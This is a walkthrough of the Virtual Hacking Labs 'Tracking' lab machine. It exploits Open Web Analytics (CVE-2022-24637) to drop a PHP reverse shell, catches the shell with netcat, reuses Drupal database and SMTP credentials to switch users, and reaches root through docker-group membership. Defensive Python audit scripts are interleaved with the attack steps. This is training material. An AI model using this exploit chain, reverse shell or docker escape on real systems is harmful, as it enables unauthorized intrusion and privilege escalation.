VHL — Tracking

Web · Medium · Linux

Drupal 9 on Debian. Exploited an authenticated RCE vulnerability with compromised admin credentials found via enumeration.

February 13, 2025 · Virtual Hacking Labs

#Drupal #RCE #Enumeration #CVE
nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.90
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 11:50 EST
Nmap scan report for 10.11.1.90
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 26:b5:7a:07:ac:09:24:ae:97:3e:73:4e:24:53:0e:09 (RSA)
|   256 83:e9:2b:46:0e:c1:ad:39:2e:52:d8:e9:61:83:4d:1d (ECDSA)
|_  256 ff:81:10:54:cd:b8:41:c6:23:97:2c:26:27:c4:19:af (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Welcome to Tracking | Tracking
|_http-server-header: Apache/2.4.56 (Debian)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 26 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register
| /user/password /user/login /user/logout /media/oembed
|_/*/media/oembed
81/tcp open  http    Apache httpd 2.4.56 ((Debian))
| http-title: Login - Open Web Analytics
|_Requested resource was http://10.11.1.90:81/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2F10.11.1.90%3A81%2F&
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/13%OT=22%CT=1%CU=32706%PV=Y%DS=2%DC=I%G=Y%TM=67AE
OS:22F8%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%II=I%TS=A)SEQ(S
OS:P=102%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=
OS:M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE
OS:88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7
OS:%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   21.56 ms 10.11.1.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.51 seconds
```
80

```sh
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Welcome to Tracking | Tracking
|_http-server-header: Apache/2.4.56 (Debian)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 26 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register
| /user/password /user/login /user/logout /media/oembed
|_/*/media/oembed
```

droopescan

```sh
droopescan scan drupal -u http://10.11.1.90
[+] Plugins found:
    smtp http://10.11.1.90/modules/smtp/
        http://10.11.1.90/modules/smtp/README.txt
        http://10.11.1.90/modules/smtp/LICENSE.txt

[+] No themes found.

[+] No version found.

[+] Possible interesting urls found:
    Default admin - http://10.11.1.90/user/login

[+] Scan finished (0:02:22.606588 elapsed)
```
81

```sh
81/tcp open  http    Apache httpd 2.4.56 ((Debian))
| http-title: Login - Open Web Analytics
|_Requested resource was http://10.11.1.90:81/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2F10.11.1.90%3A81%2F&
```

Open Web Analytics 1.7.3 unauth RCE

- https://github.com/0xM4hm0ud/CVE-2022-24637

```sh
python3 CVE-2022-24637.py http://10.11.1.90:81/ password 172.16.1.1 80
################################################
#          Script made by 0xM4hm0ud            #
#            Discovered by scryh               #
#                                              #
#       https://github.com/0xM4hm0ud           #
#       https://devel0pment.de/?p=2494         #
################################################
[*] Start exploit!
[*] Dont forget to setup a listener on port 80!
[*] Succesfully retrieved the cache!
[*] Succefully retrieved the tempkey: 47f34b4c...
[*] Changing Admin password
[*] Changed Admin password to: password
[*] Trying to login as Admin
[*] Succefully logged in as Admin!
[*] Changing Settings...
[*] Found log path at: /var/www/html/owa/owa-data/logs/
[*] Grabbed nonce: 6f7c04f82d
[*] Succesfully changed settings
[*] Reverse shell at http://10.11.1.90:81/owa-data/logs/shell.php
[*] Triggering reverse shell...
```
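The exploit above ends with a PHP file written into the OWA log directory and then requested over HTTP, which is the part a defender can spot on disk: a script file living in a directory that should only ever hold data. As an added example (my code, not from the writeup or from the OWA or exploit authors), the following Python script walks a web root and reports script files that sit below directories such as `logs`, `uploads` or `owa-data`. The sample tree it builds is constructed to mirror the paths in this writeup and contains only placeholder content.

```python
"""Find script files sitting in data-only directories under a web root (added example)."""
import tempfile
from pathlib import Path

# Extensions the web server would hand to the PHP interpreter.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7"}
# Directory names that should only ever hold data, never executable code.
DATA_DIR_NAMES = {"logs", "log", "cache", "tmp", "uploads", "files", "owa-data"}


def find_scripts_in_data_dirs(webroot):
    """Return web-root-relative paths of script files located below a data-only directory."""
    root = Path(webroot)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue
        rel = path.relative_to(root)
        # Any ancestor directory (relative to the web root) with a data-only name is enough.
        ancestors = {part.lower() for part in rel.parent.parts}
        if ancestors & DATA_DIR_NAMES:
            hits.append(rel.as_posix())
    return sorted(hits)


def build_sample_webroot():
    """Create a throwaway tree mirroring the layout in this writeup (constructed, placeholder contents)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    logs = root / "owa" / "owa-data" / "logs"
    logs.mkdir(parents=True)
    (logs / "owa.log").write_text("constructed log line\n")
    (logs / "shell.php").write_text("<?php /* placeholder, not a real payload */ ?>\n")
    # A legitimate entry point outside any data directory must not be flagged.
    (root / "owa" / "index.php").write_text("<?php /* legitimate application entry point */ ?>\n")
    # A non-script file inside a data directory must not be flagged either.
    files = root / "drupal" / "sites" / "default" / "files"
    files.mkdir(parents=True)
    (files / "logo.png").write_bytes(b"\x89PNG constructed")
    return str(root)


if __name__ == "__main__":
    for hit in find_scripts_in_data_dirs(build_sample_webroot()):
        print("script in data directory:", hit)
```

Against a real host, call `find_scripts_in_data_dirs("/var/www/html")`. On Apache with mod_php, pairing the check with `php_admin_flag engine off` in a `<Directory>` block for `owa-data` means a file dropped there is served as text rather than executed, which removes the step the exploit relies on.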
```sh
nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.90] 59234
bash: cannot set terminal process group (491): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tracking:/var/www/html/owa/owa-data/logs$ whoami
whoami
www-data
```

drupal config
```php
$databases['default']['default'] = array (
  'database' => 'drupal',
  'username' => 'drupal',
  'password' => 'Dr0oPaAlpsSwd',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'namespace' => 'Drupal\\mysql\\Driver\\Database\\mysql',
  'driver' => 'mysql',
  'autoload' => 'core/modules/mysql/src/Driver/Database/mysql/',
);
$settings['config_sync_directory'] = 'sites/default/files/config_JL3f_ntT7P14GhWcVmHbCWPfOsNpwqFG9higtsvVMQUOSJia3kAiOGEfoHeOIZ-IsAr8jgNE3g/sync';
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
```sh
www-data@tracking:/var/www/html/owa/owa-data/logs$ mysql -u 'drupal' -p'Dr0oPaAlpsSwd'
</owa-data/logs$ mysql -u 'drupal' -p'Dr0oPaAlpsSwd'
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.5.18-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| drupal             |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)
```
```sh
MariaDB [(none)]> use drupal;
use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [drupal]> show tables
show tables
    -> ;
;
+----------------------------------+
| Tables_in_drupal                 |
+----------------------------------+
| batch                            |
| block_content                    |
| block_content__body              |
| block_content_field_data         |
| block_content_field_revision     |
| block_content_revision           |
| block_content_revision__body     |
| cache_bootstrap                  |
| cache_config                     |
| cache_container                  |
| cache_data                       |
| cache_default                    |
| cache_discovery                  |
| cache_dynamic_page_cache         |
| cache_entity                     |
| cache_menu                       |
| cache_page                       |
| cache_render                     |
| cachetags                        |
| comment                          |
| comment__comment_body            |
| comment_entity_statistics        |
| comment_field_data               |
| config                           |
| file_managed                     |
| file_usage                       |
| history                          |
| key_value                        |
| key_value_expire                 |
| menu_link_content                |
| menu_link_content_data           |
| menu_link_content_field_revision |
| menu_link_content_revision       |
| menu_tree                        |
| node                             |
| node__body                       |
| node__comment                    |
| node__field_image                |
| node__field_tags                 |
| node_access                      |
| node_field_data                  |
| node_field_revision              |
| node_revision                    |
| node_revision__body              |
| node_revision__comment           |
| node_revision__field_image       |
| node_revision__field_tags        |
| path_alias                       |
| path_alias_revision              |
| queue                            |
| router                           |
| search_dataset                   |
| search_index                     |
| search_total                     |
| semaphore                        |
| sequences                        |
| sessions                         |
| shortcut                         |
| shortcut_field_data              |
| shortcut_set_users               |
| taxonomy_index                   |
| taxonomy_term__parent            |
| taxonomy_term_data               |
| taxonomy_term_field_data         |
| taxonomy_term_field_revision     |
| taxonomy_term_revision           |
| taxonomy_term_revision__parent   |
| user__roles                      |
| user__user_picture               |
| users                            |
| users_data                       |
| users_field_data                 |
| watchdog                         |
```
```sh
MariaDB [drupal]> select * from users_field_data;
select * from users_field_data;
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
| uid | langcode | preferred_langcode | preferred_admin_langcode | name        | pass                                                    | mail                     | timezone         | status | created    | changed    | access     | login      | init                     | default_langcode |
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
|   0 | en       | en                 | NULL                     |             | NULL                                                    | NULL                     |                  |      0 | 1681207204 | 1681207204 |          0 |          0 | NULL                     |                1 |
|   1 | en       | en                 | NULL                     | drupaladmin | $S$EEf9chKaEBR5X8ayEJuMJ9VAGs6VIMiPDQcsf4JtQKX7r5ariDQ0 | tracking@localhost.local | America/New_York |      1 | 1681207204 | 1681207533 | 1681217416 | 1681217513 | tracking@localhost.local |                1 |
+-----+----------+--------------------+--------------------------+-------------+---------------------------------------------------------+--------------------------+------------------+--------+------------+------------+------------+------------+--------------------------+------------------+
2 rows in set (0.001 sec)
```
```sh
╔══════════╣ Analyzing Drupal Files (limit 70)
-r--r--r-- 1 www-data www-data 33957 Apr 11  2023 /var/www/html/drupal/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * 'prefix' setting. If a prefix is specified, the table name will be prepended
 * alphanumeric and underscore. If no prefix is desired, do not set the 'prefix'
 *   'prefix' => 'main_',
 *   'driver' => 'pgsql',
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'prefix' => '',
 *   'driver' => 'sqlite',
 *   'database' => '/path/to/databasefilename',
 *   'driver' => 'my_driver',
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'prefix' => '',
  'database' => 'drupal',
  'username' => 'drupal',
  'password' => 'Dr0oPaAlpsSwd',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
```
```sh
mysql -u 'sqlusername' -p'sqlpassword'
```

config table

```sh
MariaDB [drupal]> select * from config;
| | smtp.settings | a:20:{s:5:"_core";a:1:{s:19:"default_config_hash";s:43:"HENvUIeX6xNPGRB1w3z6rT9a71LM_hKXATF6XrM9WvM";}s:7:"smtp_on";b:0;s:9:"smtp_host";s:9:"127.0.0.1";s:15:"smtp_hostbackup";s:0:"";s:9:"smtp_port";s:2:"25";s:13:"smtp_protocol";s:8:"standard";s:12:"smtp_autotls";b:0;s:12:"smtp_timeout";i:30;s:13:"smtp_username";s:8:"tracking";s:13:"smtp_password";s:13:"TracK!n9AdmiN";s:9:"smtp_from";s:24:"tracking@localhost.local";s:13:"smtp_fromname";s:8:"tracking";s:20:"smtp_client_hostname";s:0:"";s:16:"smtp_client_helo";s:0:"";s:14:"smtp_allowhtml";s:1:"0";s:17:"smtp_test_address";s:0:"";s:20:"smtp_reroute_address";s:0:"";s:14:"smtp_debugging";b:0;s:16:"prev_mail_system";s:8:"php_mail";s:14:"smtp_keepalive";b:1;} |
```
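Drupal stores module settings in the config table as PHP-serialized blobs, which is why the SMTP password is readable in plaintext in the row above once the database credentials from settings.php are known. As an added example that is not part of the writeup, here is a small Python parser for that serialization format together with an audit that flags string values stored under credential-looking keys. The sample rows are constructed: one is the smtp.settings row copied from the output above, the other is a harmless row written for the example.

```python
"""Parse PHP-serialized Drupal config rows and flag plaintext secrets (added example)."""
import re

# Key names that normally carry a credential; matched case-insensitively on the leaf key.
SECRET_KEY = re.compile(r"pass(word)?|secret|token|api_?key|private", re.I)


def _parse(buf, pos):
    """Parse one serialized value at buf[pos]; return (value, position after it).
    Handles N (null), b, i, d, s and a. PHP arrays are ordered maps, so they become dicts."""
    kind = buf[pos:pos + 1]
    if kind == b"N":
        return None, pos + 2                       # "N;"
    if kind in (b"b", b"i", b"d"):
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode()
        value = {b"b": lambda r: r == "1", b"i": int, b"d": float}[kind](raw)
        return value, end + 1
    if kind == b"s":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])           # byte length, hence parsing on bytes
        start = colon + 2                          # skip ':"'
        text = buf[start:start + length].decode("utf-8", "replace")
        return text, start + length + 2            # skip '";'
    if kind == b"a":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        p = colon + 2                              # skip ':{'
        items = {}
        for _ in range(count):
            key, p = _parse(buf, p)
            items[key], p = _parse(buf, p)
        return items, p + 1                        # skip '}'
    # 'O:' objects are rejected on purpose: config blobs only need scalars and arrays.
    raise ValueError(f"unsupported type {kind!r} at offset {pos}")


def php_unserialize(data):
    """Unserialize a str or bytes PHP value into Python objects."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def find_secrets(value, path=""):
    """Walk a parsed tree; return (dotted.path, value) for non-empty strings under a secret-looking key."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            hits.extend(find_secrets(child, f"{path}.{key}" if path else str(key)))
    elif isinstance(value, str) and value and SECRET_KEY.search(path.rsplit(".", 1)[-1]):
        hits.append((path, value))
    return hits


def audit_config_rows(rows):
    """rows: iterable of (name, data) pairs as read from Drupal's config table."""
    findings = []
    for name, data in rows:
        for path, value in find_secrets(php_unserialize(data)):
            findings.append((name, path, value))
    return findings


# Constructed sample: the smtp.settings row copied from this writeup plus a harmless row.
SAMPLE_ROWS = [
    ("smtp.settings",
     'a:20:{s:5:"_core";a:1:{s:19:"default_config_hash";s:43:"HENvUIeX6xNPGRB1w3z6rT9a71LM_hKXATF6XrM9WvM";}'
     's:7:"smtp_on";b:0;s:9:"smtp_host";s:9:"127.0.0.1";s:15:"smtp_hostbackup";s:0:"";s:9:"smtp_port";s:2:"25";'
     's:13:"smtp_protocol";s:8:"standard";s:12:"smtp_autotls";b:0;s:12:"smtp_timeout";i:30;'
     's:13:"smtp_username";s:8:"tracking";s:13:"smtp_password";s:13:"TracK!n9AdmiN";'
     's:9:"smtp_from";s:24:"tracking@localhost.local";s:13:"smtp_fromname";s:8:"tracking";'
     's:20:"smtp_client_hostname";s:0:"";s:16:"smtp_client_helo";s:0:"";s:14:"smtp_allowhtml";s:1:"0";'
     's:17:"smtp_test_address";s:0:"";s:20:"smtp_reroute_address";s:0:"";s:14:"smtp_debugging";b:0;'
     's:16:"prev_mail_system";s:8:"php_mail";s:14:"smtp_keepalive";b:1;}'),
    ("system.site", 'a:2:{s:4:"name";s:8:"Tracking";s:6:"slogan";s:0:"";}'),
]

if __name__ == "__main__":
    for name, path, value in audit_config_rows(SAMPLE_ROWS):
        print(f"{name}: {path} holds a plaintext secret ({len(value)} chars)")
```

Feed it the `(name, data)` pairs from `SELECT name, data FROM config` to get a per-key inventory of what an attacker with database access would learn. Secrets it flags belong in a settings.php override such as `$config['smtp.settings']['smtp_password']` populated from the environment, or in a key store, rather than in the database; and settings.php itself should not be world-readable, as it was on this host (`-r--r--r--`).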
creds
TracK!n9AdmiN
ssh to tracking

```sh
www-data@tracking:/home$ su tracking
su tracking
Password: TracK!n9AdmiN
tracking@tracking:/home$ whoami
whoami
tracking
```

```sh
tracking@tracking:~$ id
id
uid=1000(tracking) gid=1000(tracking) groups=1000(tracking),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
tracking@tracking:~$
```
privilege escalation

docker group

```sh
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1000(tracking) gid=1000(tracking) groups=1000(tracking),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
```

```sh
tracking@tracking:~$ docker image ls
REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
alpine       latest    9ed4aefc74f6   22 months ago   7.05MB
```

```sh
tracking@tracking:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt bash
root@411c4a4debaa:/# whoami
root
root@411c4a4debaa:/# cat /root/key.txt
6yafx5x4huqavrx6mn9e
root@411c4a4debaa:/# date
Thu Feb 13 16:00:49 EST 2025
```
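The escalation above works because membership in the docker group lets a user talk to the Docker socket and mount the host filesystem into a container as root, so the group is effectively root. As an added example that is not part of the writeup, the following Python audit parses `id` output and /etc/group text and reports groups that carry that kind of access. The `id` line is the one shown above; the /etc/group excerpt is constructed for the example and not taken from the target.

```python
"""Audit for group memberships that are equivalent to root (added example)."""
import re

# Membership in any of these grants root-equivalent access on a typical host:
# docker/lxd can mount the host filesystem into a container, disk can read raw
# block devices, sudo/wheel usually carry unrestricted sudo rules.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk", "sudo", "wheel"}


def root_equivalent_from_id(id_output):
    """Return the root-equivalent groups named in one line of `id` output."""
    match = re.search(r"groups=(.*)$", id_output.strip())
    if not match:
        return []
    # Each entry looks like 998(docker); keep the name only.
    names = re.findall(r"\d+\(([^)]+)\)", match.group(1))
    return sorted(name for name in names if name in ROOT_EQUIVALENT_GROUPS)


def root_equivalent_from_group_file(group_text):
    """Map each root-equivalent group in /etc/group text to its (non-empty) member list."""
    findings = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")          # name:password:gid:member,member
        if len(parts) < 4:
            continue
        name, members = parts[0], [m for m in parts[3].split(",") if m]
        if name in ROOT_EQUIVALENT_GROUPS and members:
            findings[name] = members
    return findings


# Constructed inputs: the `id` line copied from this writeup, and an /etc/group
# excerpt written for this example. sudo has no members, so it must not be reported.
SAMPLE_ID = ("uid=1000(tracking) gid=1000(tracking) groups=1000(tracking),24(cdrom),25(floppy),"
             "29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)")
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:
netdev:x:108:tracking
docker:x:998:tracking
"""

if __name__ == "__main__":
    print("root-equivalent groups for this user:", root_equivalent_from_id(SAMPLE_ID))
    print("root-equivalent groups with members:", root_equivalent_from_group_file(SAMPLE_GROUP_FILE))
```

On a live host, pass the output of `id` and the contents of /etc/group; any hit for docker means that account can do exactly what the writeup shows. The fix is to remove the account from the group and, if it genuinely needs containers, to use rootless Docker or a narrow sudo rule instead of socket access.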